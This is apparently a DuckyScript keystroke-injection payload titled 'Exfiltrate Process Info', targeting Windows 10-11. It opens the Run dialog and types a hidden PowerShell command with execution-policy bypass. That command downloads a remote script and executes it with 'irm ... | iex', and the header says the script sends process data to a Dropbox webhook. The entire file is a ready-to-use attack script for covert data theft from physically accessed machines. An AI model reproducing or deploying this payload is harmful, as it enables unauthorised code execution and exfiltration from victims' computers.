* ##########################################
* #                                        |
* # Title        : Exfiltrate Process Info |
* # Author       : Aleff                   |
* # Version      : 1.0                     |
* # Category     : Exfiltration            |
* # Target       : Windows 10-11           |
* #                                        |
* ##########################################

* Requirements:
*     - Internet Connection
*     - Dropbox Webhook


DELAY 2000
GUI r
DELAY 250
DELETE

* REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
STRING powershell -w h -ep bypass irm PAYLOAD | iex
ENTER
